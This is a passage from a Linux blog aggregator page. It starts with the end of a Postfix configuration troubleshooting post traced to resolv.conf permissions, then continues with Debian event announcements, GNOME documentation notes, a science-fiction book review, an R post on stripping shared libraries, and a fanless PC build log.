= /etc/pki/tls/certs/tormento.olea.org.crt.pem smtp_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem smtp_tls_mandatory_protocols = !SSLv2,!SSLv3 smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtpd_helo_required = yes smtpd_recipient_restrictions = permit_mynetworks check_client_access hash:/etc/postfix/access permit_sasl_authenticated reject_non_fqdn_recipient reject_non_fqdn_sender reject_rbl_client cbl.abuseat.org reject_rbl_client dnsbl-1.uceprotect.net reject_rbl_client zen.spamhaus.org reject_unauth_destination check_recipient_access hash:/etc/postfix/roleaccount_exceptions reject_multi_recipient_bounce check_helo_access pcre:/etc/postfix/helo_checks.pcre reject_non_fqdn_hostname reject_invalid_hostname check_sender_mx_access cidr:/etc/postfix/bogus_mx.cidr check_sender_access hash:/etc/postfix/rhsbl_sender_exceptions check_policy_service unix:postgrey/socket permit smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname, olea.org, cacharreo.club smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem smtpd_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem smtpd_tls_loglevel = 1 smtpd_tls_mandatory_protocols = TLSv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev:/dev/urandom transport_maps = hash:/etc/postfix/transport unknown_local_recipient_reject_code = 550 virtual_maps = hash:/etc/postfix/virtual

and my master.cf:

$ postconf -M smtp inet n - n - - smtpd submission inet n - n - - smtpd -o smtpd_tls_security_level=may -o smtpd_sasl_auth_enable=yes -o cleanup_service_name=cleanup_submission -o content_filter=smtp-amavis:[127.0.0.1]:10023 smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes pickup unix n - n 60 1 pickup cleanup unix n - n - 0 cleanup qmgr unix n - n 300 1 qmgr tlsmgr unix - - n 1000? 1 tlsmgr rewrite unix - - n - - trivial-rewrite bounce unix - - n - 0 bounce defer unix - - n - 0 bounce trace unix - - n - 0 bounce verify unix - - n - 1 verify flush unix n - n 1000? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - n - - smtp relay unix - - n - - smtp -o fallback_relay= showq unix n - n - - showq error unix - - n - - error retry unix - - n - - error discard unix - - n - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - n - - lmtp anvil unix - - n - 1 anvil scache unix - - n - 1 scache smtp-amavis unix - - n - 2 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20 127.0.0.1:10025 inet n - n - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks,reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks_style=host -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks policy unix - n n - 2 spawn user=nobody argv=/usr/bin/perl /usr/share/postfix/policyd-spf-perl

I fear I’m missing something really obvious but I’ve been googling for two days doing any amount of tests and now I don’t know what much to do.

Thanks in advance.

Post data:

Well, this is embarrassing. As I predicted my problem was caused by the most obvious and trivial reason: lack of read access to /etc/resolv.conf for the postfix user o_0

As you probably know the postfix subproceses (smtp, smtpd, qmgr, etc) runs with the postfix user. All the comments and suggestion I’ve received has been related with problems accessing to DNS resolving data and the usual suspects has been SELinux or a chrooted postfix. You all were right in the final reason. Following an advice and tried:

# sudo -u postfix -H cat /etc/resolv.conf cat: /etc/resolv.conf: Permission denied

So… What??

# ls -l /etc/resolv.conf -rw-r-----. 1 root named 118 mar 28 20:34 /etc/resolv.conf

OMG!… then after a chmod o+r and restarting Postfix all the email on hold can be processed and sent and new mail is processed as expected.

I doubt I’ve changed the resolv.conf reading permissions but I can’t be 100% sure. So finally the problem is fixed and I’m very sorry for stole the attention of all of you for this ridiculous reason.

Thanks you all.

Holger Levsen: 20190328-mini-debconf-hamburg-2019

Planet Debian - Enj, 28/03/2019 - 12:21md
Registration now open for the Mini-DebConf in Hamburg in June 2019

Moin!

With great joy we are finally offically announcing the Debian MiniDebConf which will take place in Hamburg (Germany) from June 5 to 9, with three days of Debcamp style hacking, followed by two days of talks, workshops and more hacking. And then, Monday the 10th is also a holiday in Germany (and some other countries), so you might choose to extend your stay by a day! (Though there will not be an official schedule for the 10th.)

TL;DR: We're having a MiniDebConf 2019 in Hamburg on June 5-9 It's going to be awesome. You should all come! Register now!

We tried to cut the longer version below a bit shorter and rely more on the wiki. If some information is missing, please reply to this email and we'll fix it.

Registration

Please register now, registration is free and open now until May 23rd.

In order to register, add your name and details to the registration page in the Debian wiki.

There's space for approximately 150 people due to limited space in the main auditorium.

Please register ASAP, as we need this information for planning food and hacking space size calculations.

Talks wanted (CfP)

We have assembled a content team (consisting of Michael Banck and Lee Garrett), who soon will publish an extra post for the CfP. Though you don't need to wait for that and can already send your proposals to

cfp@minidebconfhamburg.debian.net

We will have talks on Saturday and Sunday, the exact slots are yet to be determined by the content team.

We expect submissions and talks to be held in English, as this is the working language in Debian and at this event.

Debian Sprints

The miniDebcamp from Wednesday to Friday is a perfect opportunity to host Debian sprints. We would welcome if teams assemble and work together on their projects.

Sponsors wanted

Making a Mini DebConf happen costs money, we need to rent the venue, video gear, hopefully can pay hard working volunteers lunch and dinner, probably sponsor some travel costs and last not least print T-Shirts.

We very much appreciate companies willing to support Debian through this meeting!

We have three sponsor categories:

  • 1000€ = sponsor, listed as such in all material and on the t-shirts.

  • 2500€ = gold sponsor, listed as such in all material & shirts, logo featured in the videos.

  • 5000€ = platinum sponsor, listed as such prominently in all material & shirts, logo featured prominently in the videos

Plus, there's corporate registration as an option too, where we will charge you 250€ for the registration. Please contact us if you are interested in that!

Location

The event will be hosted in the Victoria Kaserne (also called Fux or Frappant), which is a collective art space located in a historical monument. It is located between S-Altona and S-Holstenstraße, so there is a direct subway connection to/from the Hamburg Airport (HAM) and Altona is also a long distance train station.

There's a Gigabit-Fiber uplink connection and wireless coverage basically everywhere in the venue and in the outside areas.

More information about the venue is provided in the wiki.

Accommodation

The Mini-DebConf will take place in the center of Hamburg, so there are many accomodation options available. Some suggestions for housing options are given in the wiki and you might want to share your findings there too.

There is also limited on-site accomodation available, please send a mail to holger@d.o if you'd like to stay on site

More volunteers wanted

Some things still need more helping hands:

We need some volunteers for frontdesk duties, which mostly means being at the venue in the morning before things start (though if possible frontdesk should be operated throughout the day)and help people find their way.

We also need more video volunteers. We know the gear will arrive, together with a person knowing how to operate it, but that's it. Please consider making sure we'll have videos released! (And streams hopefully too.)

In general, if you notice something to improve, try to be the change you want to see.

Contact

If you want to help, need help, have comments or want to contact us for other reasons, there are several ways:

  • the irc channel #debconf-hamburg on irc.debian.org
  • the mailing list debian-events-eu@lists.debian.org
  • editing the wiki page which will notify us

Looking forward to see you in Hamburg!


Holger, for the 2019 Mini DebConf Hamburg team

Bits from Debian: Debian is welcoming applicants for Outreachy and GSoC 2019

Planet Debian - Enj, 28/03/2019 - 12:15md

Debian is dedicated to increasing the diversity of contributors to the project and improving the inclusivity of the project. We strongly believe working towards these goals provides benefits both for people from backgrounds that are currently under-represented in free software, and for the wider movement, by increasing the range of skills, experiences and viewpoints contributing to it.

As part of this outreach effort, Debian is participating in the next round of Outreachy.

The application period for the May 2019 to August 2019 round has been extended until April 2, and Debian offers the following projects:

Outreachy invites applicants who are women (both cis and trans), trans men, and genderqueer people to apply. Anyone who faces systemic bias or discrimination in the technology industry of their country is also invited to apply.

Don't wait up! You can learn more details on how to submit your application or get help in our wiki page for Outreachy and the Outreachy website.

Debian is also participating in the Google Summer of Code (GSoC) with eight projects, and the student application period is open until April 9.

You can learn more details on how to submit your GSoC application or get help for in our wiki page for GSoC and the Google Summer of Code website.

We encourage people who are elegible for Outreachy and GSoC to submit their application to both programs.

Andre Klapper: Updating some GNOME 3.32 user documentation

Planet GNOME - Enj, 28/03/2019 - 4:51pd

Apart from replacing many broken links to git.gnome.org or replacing links to GNOME Bugzilla with links to GNOME Gitlab in many code repositories and wiki pages, in the last months I spent some good time updating random GNOME user docs all over the place:

  • The user docs for Rhythmbox 3.4.3, GNOME Chess 3.32, five-or-more 3.32 and four-in-a-row 3.32 should be up-to-date.
  • The Totem 3.32 user documentation is up-to-date and now in Mallard format, based on work started in 2013 by Magda and Kat.
  • The screenshots in the user help of gnome-klotski, simple-scan, swell-foop, tali, and zenity are up-to-date.
  • Updated hopefully all places which mentioned an application menu now replaced by a menu button.
  • Removed a bunch of unused help images from some repositories shipped for no reason and bloating tarballs.

Enjoy and check the GNOME Wiki if you are interested in working on user documentation!

Russ Allbery: Review: Caliban's War

Planet Debian - Enj, 28/03/2019 - 4:44pd

Review: Caliban's War, by James S.A. Corey

Series: The Expanse #2 Publisher: Orbit Copyright: June 2012 ISBN: 0-316-20227-4 Format: Kindle Pages: 594

Caliban's War is the sequel to Leviathan Wakes and the second book in the Expanse series. This is the sort of series that has an over-arching, long-term plot line with major developments in each book, so it's unfortunately easy to be spoiled by reading anything about later volumes of the series. (I'm usually reasonably good at avoiding spoilers, but still know a bit more than I want about subsequent developments.) I'm going to try to keep this review relatively free of spoilers, but even discussion of characters gives a few things away. If you want to stay entirely unspoiled, you may not want to read this.

Also, as that probably makes obvious, there's little point in reading this series out of order, although the authors do a reasonably good job filling in the events of the previous book. (James S.A. Corey is a pseudonym for the writing team of Daniel Abraham and Ty Franck.) I still resorted to reading the Wikipedia plot summary, though, since it had been years since I read the first book.

Caliban's War opens on Ganymede, a year and a half after the events of Leviathan Wakes. Thanks to its magnetosphere, Ganymede enjoys rare protection from Jupiter's radiation field. Thanks to meticulously-engineered solar arrays, it is the bread basket of the outer solar system. That's before an inhuman creature attacks a unit of Earth and then Martian soldiers, killing all but one of them and sparking an orbital battle between Mars and Earth that destroys much of Ganymede's fragile human ecosystem. Ganymede's collapse is the first problem: a humanitarian catastrophe. The second problem is the attacking creature, which may be a new destabilizing weapon and may be some new twist on the threat of Leviathan Wakes. And the third problem is Venus, where incomprehensible things are happening that casually violate the known laws of physics.

James Holden returns to play a similar role as he did in Leviathan Wakes: the excessively idealistic pain in the ass who tends to blow open everyone's carefully-managed political machinations. Unfortunately, I think this worked much less well in this book. Holden has a crisis of conscience and spends rather a lot of the book being whiny and angstful, which I found more irritating than entertaining. I think it was an attempt at showing some deeper nuance in his relationships with his crew, but it didn't work for me.

The new character around whom the plot revolves is Prax, a botanist whose daughter is mysteriously kidnapped in the prelude of the book. (Apparently it can't be an Expanse novel without a kidnapped girl or woman.) He's unfortunately more of a plot device than a person for most of the story. One complaint I have about this about this book is that the opening chapters on Ganymede drag on for much longer than I'd prefer, while running Prax through the wringer and not revealing much about the plot. This is another nearly 600 page book; I think it would have been a tighter, sharper book if it were shorter.

That said, the other two new viewpoint characters, Bobbie and Avasarala, make up for a lot.

Avasarala is an apparently undistinguished member of the UN Earth government who has rather more power than her position indicates because she's extremely good at political maneuvering. I loved her within twenty pages of when she was introduced, and kept being delighted by her for the whole book. One of my favorite tropes in fiction is watching highly competent people be highly competent, and it's even better when they have engagingly blunt personalities. Avasarala is by turns grandmotherly and ruthless, polite and foul-mouthed, and grumpy and kind. Even on her own, she's great; when she crosses paths with Bobbie, the one surviving Martian marine from the initial attack who gets tangled in the resulting politics, something wonderful happens. Bobbie's principled and straightforward honesty is the perfect foil for Avasarala's strategic politics. Those sections are by far the best part of this book.

I think this is a somewhat weaker book than Leviathan Wakes. It starts slow and bogs down a bit in the middle with Holden's angst and relationship problems. But Avasarala is wonderful and makes everything better and gets plenty of viewpoint chapters, as does Bobbie who becomes both a lens through which to see more of Avasarala and a believable and sympathetic character in her own right. The main plot of the series does move forward somewhat, but this feels like mostly side story and stage setting. If you enjoyed Leviathan Wakes, though, I think you'll enjoy this, for Avasarala and Bobbie if nothing else.

Caliban's War satisfactorily closes out its own plot arc, but it introduces a substantial cliff-hanger in the last pages as setup for the next book in the series.

Followed by Abaddon's Gate in the novel sense. There is a novella, Gods of Risk, set between this book and Abaddon's Gate, but it's optional reading.

Rating: 7 out of 10

Dirk Eddelbuettel: #21: A Third and Final (?) Post on Stripping R Libraries

Planet Debian - Enj, 28/03/2019 - 3:31pd

Welcome to the 21th post in the reasonably relevant R ramblings series, or R4 for short.

Back in August of 2017, we wrote two posts #9: Compating your Share Libraries and #10: Compacting your Shared Libraries, After The Build about “stripping” shared libraries. This involves removing auxiliary information (such as debug symbols and more) from the shared libraries which can greatly reduce the installed size (on suitable platforms – it mostly matters where I work, i.e. on Linux). As an illustration we included this chart:

Chart from August 2017 post

Two items this week made me think of these posts. First was that a few days ago I noticed the following src/Makefile of the precrec package I was starting to use more:

# copied from https://github.com/vinecopulib/rvinecopulib # strip debug symbols for smaller Linux binaries strippedLib: $(SHLIB) if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \ then /usr/bin/strip --strip-debug $(SHLIB); fi .phony: strippedLib

And lo and behold, the quoted package rvinecopulib

has the same

CXX_STD = CXX11 PKG_CPPFLAGS = -I../inst/include -pthread # strip debug symbols for smaller Linux binaries strippedLib: $(SHLIB) if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \ then /usr/bin/strip --strip-debug $(SHLIB); fi .phony: strippedLib

I was intrigued and googled a little. To my surprise I found one related reference … in a stone-old src/Makevars of mine in RcppClassic and probably written in 2007 or 2008. But more astonishing, the actual reference to the “phony target” trick is in … the #9 post from August 2017 referenced above. Doh. Younger me knew this, current me did not, and as those two packages didn’t reference my earlier use I had to re-find it. Oh well.

But the topic is still a very important one. The two blog posts show how to deal with this locally as a user and “consumer” of packages (as well as via the “phony trick” as a producer of packages) as well as an admin of a system with such packages. Personally I had been using this trick since August 2017 via my ~/.R/Makevars.

And we were still missing such a tool for the more general deployment. Well, until today, or rather, until R 3.6.0 comes out offically on April 26. The (excellent) R-devel Daily ‘NEWS’ feed – which itself was the topic of post #3: Follow R-devel – will likely show tomorrow something about this commit I spotted by following Winston’s mirror of the R-devel sources:

Part of ‘strip on install’ commit

And indeed, we now can now do this with R-devel (rebuilt from today’s sources):

edd@rob:~$ RD CMD INSTALL --help | grep strip --strip strip shared object(s) edd@rob:~$

As a quick check, installing the (small, C-only) digest package without / with the --strip options gets us, respectively, 425kb and 123kb. So the ratios from the chart above should now be achievable directly from R CMD INSTALL --strip with R 3.6.0. (And for what it is worth, it still works with the older tricks mentioned above.)

And as occupying disk space with unused debugging symbols is wasteful, the new extension to R CMD INSTALL is most welcome.

Last but not least: It is this type of relentless small improvements to R, its innards, its installations and support by R Core that make this system for Programming with Data such an excellent tool and joy to use and follow. A big Thank You! to R Core for all they do, and do quietly yet relentlessly. It is immensely appreciated.

Olav Vitters: New computer

Planet GNOME - Enj, 28/03/2019 - 12:50pd

Shortly after I assembled my current/old pc the older pc died. I intended to have two and ended up with only one; my NUC. With memory prices slowly dropping to more affordable levels I decided to assemble a new pc.  I tried to go for components with a good price/performance. I don’t want to spend 50% more for maybe 10% more performance. Next to price/performance I opted for an AMD CPU because Intel has so many more security issues. I went with a 1TB SSD (SATA because of price/performance), 65W TDP AMD Ryzen with integrated GPU, a mini-ITX size motherboard with good 5.1+ sound, plus a fanless case. PSU wise I found a laptop-like PSU/charger which needed a DC-DC converter. The result is an utterly quiet pc. I did a stress test and checked the temperatures. Everything seems ok, though wonder how things will be during summer. I quite like the lack of any noise.
My existing older pc is a NUC with a slowly spinning fan. I noticed a company making fanless cases for pretty much all NUC models. I’m wondering whether to make my existing NUC fanless, or maybe do something else.

Installing Mageia was annoying. Latest stable didn’t work, latest beta same. Eventually ended up installing it via internet (net install).

Before buying all the components I wasn’t aware something like fanless existed for such a CPU. It’s nice to do the research and make a pc which mostly follows the  tips  I found, my preferences and the trade-offs I had to make. Price wise I spent about 800 EUR on the various components (I didn’t list all of them). In case people want to know the exact components I’ll put it into the comments (update: had to put it under the “more” link). I’m trying to avoid making this appear as an advertisement.

I’m going to link to a Dutch price comparison website for most items.

    • CPU: AMD Ryzen 5 2400G Boxed
      In Q2/Q3 2019 AMD will release newer Ryzen CPU’s. I stopped caring about getting the latest each time.
    • Motherboard: ASRock Fatal1ty B450 Gaming-ITX/ac
    • Case: Streacom FC8 Alpha Fanless (without space for CD/DVD/Blueray reader)
    • Memory: G.Skill Aegis F4-3000C16D-32GISB
      This memory arrives without a heat sink. I bought 2 types of heat sinks from AliExpress. They’re still to arrive so haven’t listed them yet. A heat sink might not be needed but I rather be careful.
    • SSD (M.2 format using SATA): Crucial MX500 m.2 1TB
    • Pico PSU: Mini-box picoPSU-150-XT
      I bought this for 42.50 EUR incl shipping, current price is way higher. You’ll probable want to search around for better prices. I wasn’t sure if to get 150 Watt or the 120 Watt version. I noticed some people reporting stability problems with 120 Watt, though that could be due to heat instead of power. The integrated GPU can be power hungry; I doubt I’ll ever use something GPU intense.
    • Power supply: Leicke ULL PSU Power Supply 150W
      This is significantly cheaper on Amazon UK than Amazon DE. For me the UK one came with a EU power outlet and was sent quickly from Germany. I was expecting to get a UK power outlet and then use a spare ‘monitor’ cable to make it work.
    • Better thermal compound: ARCTIC MX-4 2019 Edition – 8 gram
      Use keepa.com plugin for your browser to compare the prices across Amazon sites. Amazon was cheaper than any price comparison site.
    • ATX 90 degree power adapter: Mainboard Motherboard ATX 24Pin to 24Pin 90 Degree Power Adapter Connector
      This bit hasn’t arrived yet. I added this to ensure there is more space between the memory and the pico psu (both sources of heat). Further, the internal USB3 cable from the case is very sturdy. Turning the pico psu 90 degrees will help with that internal USB3 cable, plus optimize heat dissipation.
    • Internal USB3 90 degree adapter: USB 3.0 20pin Male to Female Extension Adapter Angled 90 Degree for Motherboard Mainboard
      Similar to the ATX 90 degree adapter. This is solely meant for making it easier to connect that sturdy internal USB3 cable.
    • M.2 heatsink: Pure Copper Cooling M.2 NGFF 2260 Solid Hard Disk Cooler Heat Sink
      I wanted this due to remarks that a M.2 SSD could run quite hot, combined with the lack of airflow in the case (as it’s fanless). It’s only a few EUR and I wanted to be on the safe side.
      Note: It’s tiny! Despite being for M.2 it’s smaller (5cm wide) than expected. I’m still not entirely sure if it’s needed.

     

    General tips:

    • The power supply and the pico psu/DC-DC converter aren’t 100% efficient. Meaning, 150 Watt from the power supply will be less when it arrives at the pico psu. Same for when it arrives in the mother board. On the other hand, power supplies are really inefficient if they’re underutilized. Meaning, if you only run it at 50% performance the power supply and convertor will waste a lot of power. Make sure to pay attention that the voltages are all ok. Meaning: that everything accepts the same voltage (12 or 19 Volts seems to be common).
    • AliExpress and Ebay have a lot of questionable Pico PSU/DC-DC converters. They’re cheap, but the reviews made me question buying those. I noticed a lot of sites reselling the AliExpress ones under various brands. Make sure to recognize those AliExpress ones. See for instance the ones sold by RGeek store.
    • I bought 20 grams of thermal paste due to a) better heat transfer than the one which came with the case b) a comment that there isn’t enough thermal paste with the case. The case came with (I think) 2x 10 grams. I’m pretty sure 8 grams would be enough and I applied it generously. If you get a less power hungry CPU then stick with the one from the case; it’s pretty good as well from reading the specification. Spec showed 5W/m.K, the one I have is around 8.5W/m.K.
    • Another price comparison sites I know: Geizhals.eu, I also used Google
    • The Dutch Tweakers.net site allows you to add multiple products and then calculate the cheapest combination of shops including shipping costs (probably only works for .nl, .be). It also gives alternative shop combinations.
    • Fanless NUC cases: Akasa, they also have nice options for motherboards for Intel CPU’s (seems most of those motherboard have a fixed layout).
    • I wanted the pc to be small. My NUC is tiny, the new pc is still huge in comparison. You’re paying a significant premium to have use small components. If you do not go for mini-ITX sized motherboard you can save a lot on the motherboard. Same for the fanless case, it’s also possible to use a quiet CPU cooler (e.g. Noctua NH-L9a-AM4). The fanless case plus PSU and so on was 200 EUR. There’s cases for 40-50 EUR including PSU.

Faqet

Subscribe to AlbLinux agreguesi